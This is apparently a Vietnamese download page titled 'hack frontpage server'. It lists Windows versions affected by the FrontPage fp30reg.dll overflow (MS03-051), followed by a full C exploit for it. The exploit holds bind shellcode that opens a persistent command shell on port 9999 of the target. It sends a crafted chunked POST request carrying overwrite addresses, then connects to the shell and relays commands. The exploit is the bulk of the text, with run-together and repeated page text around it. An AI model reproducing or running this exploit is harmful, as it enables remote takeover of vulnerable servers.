Đang tải... (xem toàn văn)
hack frontpage server
Microsoft FrontPage Server Extensions Remote Debug Buffer Overrun Vulnerabilitytrang này đã được đọc lần Phiên bản ảnh hưởng:vulnerable Microsoft FrontPage Server Extensions 2000 + Microsoft Windows 2000 Advanced Server + Microsoft Windows 2000 Advanced Server SP1+ Microsoft Windows 2000 Advanced Server SP2+ Microsoft Windows 2000 Advanced Server SP3+ Microsoft Windows 2000 Datacenter Server + Microsoft Windows 2000 Datacenter Server SP1+ Microsoft Windows 2000 Datacenter Server SP2+ Microsoft Windows 2000 Datacenter Server SP3+ Microsoft Windows 2000 Professional + Microsoft Windows 2000 Professional SP1+ Microsoft Windows 2000 Professional SP2+ Microsoft Windows 2000 Professional SP3+ Microsoft Windows 2000 Server + Microsoft Windows 2000 Server SP1+ Microsoft Windows 2000 Server SP2+ Microsoft Windows 2000 Server SP3+ Microsoft Windows XP Home + Microsoft Windows XP Home SP1+ Microsoft Windows XP Professional + Microsoft Windows XP Professional SP1Microsoft FrontPage Server Extensions 2002 Microsoft SharePoint Team Services 2002 + Microsoft Office XP SP1Microsoft Windows 2000 Advanced Server SP3Microsoft Windows 2000 Advanced Server SP2Microsoft Windows 2000 Datacenter Server SP3Microsoft Windows 2000 Datacenter Server SP2Microsoft Windows 2000 Professional SP3Microsoft Windows 2000 Professional SP2Microsoft Windows 2000 Server SP3Microsoft Windows 2000 Server SP2Microsoft Windows XP 64-bit Edition SP1Microsoft Windows XP Home SP1Microsoft Windows XP Professional SP12. Code khai thác :complite with winshock.h và vài thủ thuật nhỏ/*******************************************************************************Frontpage fp30reg.dll Overflow (MS03-051) discovered by Brett MooreExploit by Adik < netmaniac [at] hotmail.kg >Binds persistent command shell on port 9999Tested on Windows 2000 Professional SP3 English version (fp30reg.dll ver 4.0.2.5526) Greetingz/Salamchiki: fellaz in Bishkek - r0ach,acha,horsemoon :)-[ 13/Nov/2003 ]-********************************************************************************/#include <stdio.h>#include <string.h>#include <winsock.h>#pragma comment(lib,"ws2_32")#define VER "0.1" /******** bind shellcode spawns persistent shell on port 9999 *****************************/unsigned char kyrgyz_bind_code[] = {0xEB, 0x03, 0x5D, 0xEB, 0x05, 0xE8, 0xF8, 0xFF, 0xFF, 0xFF, 0x8B, 0xC5, 0x83, 0xC0, 0x11, 0x33,0xC9, 0x66, 0xB9, 0xC9, 0x01, 0x80, 0x30, 0x88, 0x40, 0xE2, 0xFA,0xDD, 0x03, 0x64, 0x03, 0x7C, 0x09, 0x64, 0x08, 0x88, 0x88, 0x88, 0x60, 0xC4, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x74, 0x77, 0xFE, 0x74, 0xE0, 0x06, 0xC6, 0x86, 0x64, 0x60, 0xD9, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x4E, 0xE0, 0xBB, 0xBA, 0x88, 0x88, 0xE0, 0xFF, 0xFB, 0xBA, 0xD7, 0xDC, 0x77, 0xDE, 0x4E, 0x01, 0xCE, 0x70, 0x77, 0xFE, 0x74, 0xE0, 0x25, 0x51, 0x8D, 0x46, 0x60, 0xB8, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x5A, 0x77, 0xFE, 0x74, 0xE0, 0xFA, 0x76, 0x3B, 0x9E, 0x60, 0xA8, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x46, 0x77, 0xFE, 0x74, 0xE0, 0x67, 0x46, 0x68, 0xE8, 0x60, 0x98, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x42, 0x77, 0xFE, 0x70, 0xE0, 0x43, 0x65, 0x74, 0xB3, 0x60, 0x88, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x7C, 0x77, 0xFE, 0x70, 0xE0, 0x51, 0x81, 0x7D, 0x25, 0x60, 0x78, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x78, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x92, 0xF8, 0x4F, 0x60, 0x68, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x64, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x25, 0xA6, 0x61, 0x60, 0x58, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x60, 0x77, 0xFE, 0x70, 0xE0, 0x6D, 0xC1, 0x0E, 0xC1, 0x60, 0x48, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x6A, 0x77, 0xFE, 0x70, 0xE0, 0x6F, 0xF1, 0x4E, 0xF1, 0x60, 0x38, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x5E, 0xBB, 0x77, 0x09, 0x64, 0x7C, 0x89, 0x88, 0x88, 0xDC, 0xE0, 0x89, 0x89, 0x88, 0x88, 0x77, 0xDE, 0x7C, 0xD8, 0xD8, 0xD8, 0xD8, 0xC8, 0xD8, 0xC8, 0xD8, 0x77, 0xDE, 0x78, 0x03, 0x50, 0xDF, 0xDF, 0xE0, 0x8A, 0x88, 0xAF, 0x87, 0x03, 0x44, 0xE2, 0x9E, 0xD9, 0xDB, 0x77, 0xDE, 0x64, 0xDF, 0xDB, 0x77, 0xDE, 0x60, 0xBB, 0x77, 0xDF, 0xD9, 0xDB, 0x77, 0xDE, 0x6A, 0x03, 0x58, 0x01, 0xCE, 0x36, 0xE0, 0xEB, 0xE5, 0xEC, 0x88, 0x01, 0xEE, 0x4A, 0x0B, 0x4C, 0x24, 0x05, 0xB4, 0xAC, 0xBB, 0x48, 0xBB, 0x41, 0x08, 0x49, 0x9D, 0x23, 0x6A, 0x75, 0x4E, 0xCC, 0xAC, 0x98, 0xCC, 0x76, 0xCC, 0xAC, 0xB5, 0x01, 0xDC, 0xAC, 0xC0, 0x01, 0xDC, 0xAC, 0xC4, 0x01, 0xDC, 0xAC, 0xD8, 0x05, 0xCC, 0xAC, 0x98, 0xDC, 0xD8, 0xD9, 0xD9, 0xD9, 0xC9, 0xD9, 0xC1, 0xD9, 0xD9, 0x77, 0xFE, 0x4A, 0xD9, 0x77, 0xDE, 0x46, 0x03, 0x44, 0xE2, 0x77, 0x77, 0xB9, 0x77, 0xDE, 0x5A, 0x03, 0x40, 0x77, 0xFE, 0x36, 0x77, 0xDE, 0x5E, 0x63, 0x16, 0x77, 0xDE, 0x9C, 0xDE, 0xEC, 0x29, 0xB8, 0x88, 0x88, 0x88, 0x03, 0xC8, 0x84, 0x03, 0xF8, 0x94, 0x25, 0x03, 0xC8, 0x80, 0xD6, 0x4A, 0x8C, 0x88, 0xDB, 0xDD, 0xDE, 0xDF, 0x03, 0xE4, 0xAC, 0x90, 0x03, 0xCD, 0xB4, 0x03, 0xDC, 0x8D, 0xF0, 0x8B, 0x5D, 0x03, 0xC2, 0x90, 0x03, 0xD2, 0xA8, 0x8B, 0x55, 0x6B, 0xBA, 0xC1, 0x03, 0xBC, 0x03, 0x8B, 0x7D, 0xBB, 0x77, 0x74, 0xBB, 0x48, 0x24, 0xB2, 0x4C, 0xFC, 0x8F, 0x49, 0x47, 0x85, 0x8B, 0x70, 0x63, 0x7A, 0xB3, 0xF4, 0xAC, 0x9C, 0xFD, 0x69, 0x03, 0xD2, 0xAC, 0x8B, 0x55, 0xEE, 0x03, 0x84, 0xC3, 0x03, 0xD2, 0x94, 0x8B, 0x55, 0x03, 0x8C, 0x03, 0x8B, 0x4D, 0x63, 0x8A, 0xBB, 0x48, 0x03, 0x5D, 0xD7, 0xD6, 0xD5, 0xD3, 0x4A, 0x8C, 0x88};void cmdshell (int sock);long gimmeip(char *hostname);int main(int argc,char *argv[]){ WSADATA wsaData;struct sockaddr_in targetTCP;struct hostent *host;int sockTCP,s; unsigned short port = 80;long ip;unsigned char header[]= "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1\r\n";unsigned char packet[3000],data[1500]; unsigned char ecx[] = "\xe0\xf3\xd4\x67";unsigned char edi[] = "\xff\xd0\x90\x90"; unsigned char call[] = "\xe4\xf3\xd4\x67";//overwrite .data section of fp30reg.dllunsigned char shortjmp[] = "\xeb\x10";printf("\n-={ Frontpage fp30reg.dll Overflow Exploit (MS03-051) ver %s }=-\n\n"" by Adik < netmaniac [at] hotmail.KG >\n http://netninja.to.kg\n\n", VER);if(argc < 2){printf(" Usage: %s [Target] <port>\n"" eg: fp30reg.exe 192.168.63.130\n\n",argv[0]);return 1; } if(argc==3)port = atoi(argv[2]); WSAStartup(0x0202, &wsaData); printf("[*] Target:\t%s \tPort: %d\n\n",argv[1],port);ip=gimmeip(argv[1]); memset(&targetTCP, 0, sizeof(targetTCP));memset(packet,0,sizeof(packet));targetTCP.sin_family = AF_INET;targetTCP.sin_addr.s_addr = ip;targetTCP.sin_port = htons(port); sprintf(packet,"%sHost: %s\r\nTransfer-Encoding: chunked\r\n",header,argv[1]); memset(data, 0x90, sizeof(data)-1);data[sizeof(data)-1] = '\x0';memcpy(&data[16],edi,sizeof(edi)-1);memcpy(&data[20],ecx,sizeof(ecx)-1); memcpy(&data[250+10],shortjmp,sizeof(shortjmp)-1);memcpy(&data[250+14],call,sizeof(call)-1); memcpy(&data[250+70],kyrgyz_bind_code,sizeof(kyrgyz_bind_code));sprintf(packet,"%sContent-Length: %d\r\n\r\n%x\r\n%s\r\n0\r\n\r\n",packet,strlen(data),strlen(data),data); if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1){printf("[x] Socket not initialized! Exiting .\n");WSACleanup();return 1;}printf("[*] Socket initialized .\n"); if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0){printf("[*] Connection to host failed! Exiting .\n");WSACleanup();exit(1);} printf("[*] Checking for presence of fp30reg.dll .");if (send(sockTCP, packet, strlen(packet),0) == -1){printf("[x] Failed to inject packet! Exiting .\n");WSACleanup();return 1;} memset(packet,0,sizeof(packet)); if (recv(sockTCP, packet, sizeof(packet),0) == -1) {printf("[x] Failed to receive packet! Exiting .\n");WSACleanup();return 1;} if(packet[9]=='1' && packet[10]=='0' && packet[11]=='0')printf(" Found!\n");else{printf(" Not Found!! Exiting .\n");WSACleanup();return 1;}printf("[*] Packet injected!\n");closesocket(sockTCP);printf("[*] Sleeping ");for(s=0;s<13000;s+=1000){printf(". ");Sleep(1000);} printf("\n[*] Connecting to host: %s on port 9999",argv[1]);if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1){printf("\n[x] Socket not initialized! Exiting .\n");WSACleanup();return 1;} targetTCP.sin_family = AF_INET;targetTCP.sin_addr.s_addr = ip;targetTCP.sin_port = htons(9999);if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0){printf("\n[x] Exploit failed or there is a Firewall! Exiting .\n");WSACleanup();exit(1);} printf("\n[*] Dropping to shell .\n\n");cmdshell(sockTCP);return 0;}/*********************************************************************************/void cmdshell (int sock){struct timeval tv;int length;unsigned long o[2];char buffer[1000];tv.tv_sec = 1;tv.tv_usec = 0;while (1) {o[0] = 1;o[1] = sock; length = select (0, (fd_set *)&o, NULL, NULL, &tv);if(length == 1) {length = recv (sock, buffer, sizeof (buffer), 0);if (length <= 0) {printf ("[x] Connection closed.\n");WSACleanup();return;}length = write (1, buffer, length);if (length <= 0) {printf ("[x] Connection closed.\n");WSACleanup();return;}}else{length = read (0, buffer, sizeof (buffer));if (length <= 0) {printf("[x] Connection closed.\n");WSACleanup();return;}length = send(sock, buffer, length, 0);if (length <= 0) {printf("[x] Connection closed.\n");WSACleanup();return;}}}}/*********************************************************************************/long gimmeip(char *hostname) {struct hostent *he;long ipaddr;if ((ipaddr = inet_addr(hostname)) < 0) {if ((he = gethostbyname(hostname)) == NULL) {printf("[x] Failed to resolve host: %s! Exiting .\n\n",hostname);WSACleanup();exit(1);}memcpy(&ipaddr, he->h_addr, he->h_length);} return ipaddr;}/*********************************************************************************/ . Microsoft FrontPage Server Extensions Remote Debug Buffer Overrun Vulnerabilitytrang này đã được đọc lần Phiên bản ảnh hưởng:vulnerable Microsoft FrontPage Server. 2000 Advanced Server + Microsoft Windows 2000 Advanced Server SP1+ Microsoft Windows 2000 Advanced Server SP2+ Microsoft Windows 2000 Advanced Server SP3+